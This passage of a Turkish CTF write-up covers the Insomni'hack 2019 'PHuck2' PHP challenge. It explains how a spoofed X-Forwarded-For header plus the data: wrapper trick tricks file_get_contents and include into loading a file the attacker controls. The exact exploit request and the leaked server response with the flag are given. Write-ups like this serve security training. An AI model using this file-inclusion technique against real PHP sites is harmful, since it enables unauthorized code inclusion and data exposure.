```php  
“127001” gibi)

\---  
```php  
$mkdir($userFolder);  
chdir($userFolder);  
file_put_contents('profile',print_r($_SERVER,true));  
chdir('..');  
```  
``$userFolder`` değeri ile klasör açar ve o klasörün içine ``profile`` adlı
dosyaya [``$_SERVER``
arrayinin](http://php.net/manual/tr/reserved.variables.server.php) içeriğini
yazar.

\---  
```php  
$_GET['page']=str_replace('.','',$_GET['page']);

if(!stripos(file_get_contents($_GET['page']),' döndürdüğü(return) değerini
ifade edecek  
file_get_contents('data:,xx/profile'); --> string 'xx/profile'  
include('data:,xx/profile'); --> 'data:,xx/profile' adına sahip dosyasının
içeriği  
```  
``data`` wrapperi ``file_get_contents``'te çalışırken ``include``'ta
çalışmadı.

yani;

```  
GET /?page=data:,xx/profile HTTP/1.1  
X-Forwarded-For: data:,xx  
Get-Flag:  
Host: phuck.teaser.insomnihack.ch

HTTP/1.1 200 OK  
Date: Sun, 20 Jan 2019 20:16:13 GMT  
Server: Apache/2.4.29 (Ubuntu)  
Vary: User-Agent,Accept-Encoding  
Content-Length: 1101  
Content-Type: text/html; charset=UTF-8

Array  
(  
[HTTP_X_FORWARDED_FOR] => data:,xx  
[HTTP_GET_FLAG] => INS{PhP_UrL_Phuck3rY_h3h3!}  
[HTTP_HOST] => phuck.teaser.insomnihack.ch  
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin  
[SERVER_SIGNATURE] => <address>Apache/2.4.29 (Ubuntu) Server at
phuck.teaser.insomnihack.ch Port 80</address>

[SERVER_SOFTWARE] => Apache/2.4.29 (Ubuntu)  
[SERVER_NAME] => phuck.teaser.insomnihack.ch  
[SERVER_ADDR] => 172.17.0.2  
[SERVER_PORT] => 80  
[REMOTE_ADDR] => ``CENSORED``  
[DOCUMENT_ROOT] => /var/www/html/  
[REQUEST_SCHEME] => http  
[CONTEXT_PREFIX] =>  
[CONTEXT_DOCUMENT_ROOT] => /var/www/html/  
[SERVER_ADMIN] => [no address given]  
[SCRIPT_FILENAME] => /var/www/html/index.php  
[REMOTE_PORT] => 42696  
[GATEWAY_INTERFACE] => CGI/1.1  
[SERVER_PROTOCOL] => HTTP/1.1  
[REQUEST_METHOD] => GET  
[QUERY_STRING] => page=data:,xx/profile  
[REQUEST_URI] => /?page=data:,xx/profile  
[SCRIPT_NAME] => /index.php  
[PHP_SELF] => /index.php  
[REQUEST_TIME_FLOAT] => 1548015373.641  
[REQUEST_TIME] => 1548015373  
)

```

Ve flag ``INS{PhP_UrL_Phuck3rY_h3h3!}``  
\---  
\---  
### NOT: Soruyu CTF sırasınca çözmüş olmayıp, CTF sornası IRC'den verilen
bilgiler (``Blaklis`` tarafından) yardımı ile yazılmıştır

~ c3z

Original writeup
(https://cybersaxostiger.github.io/2019/01/20/Insomni%E2%80%99hack-2019-%E2%80%93-PHuck2/).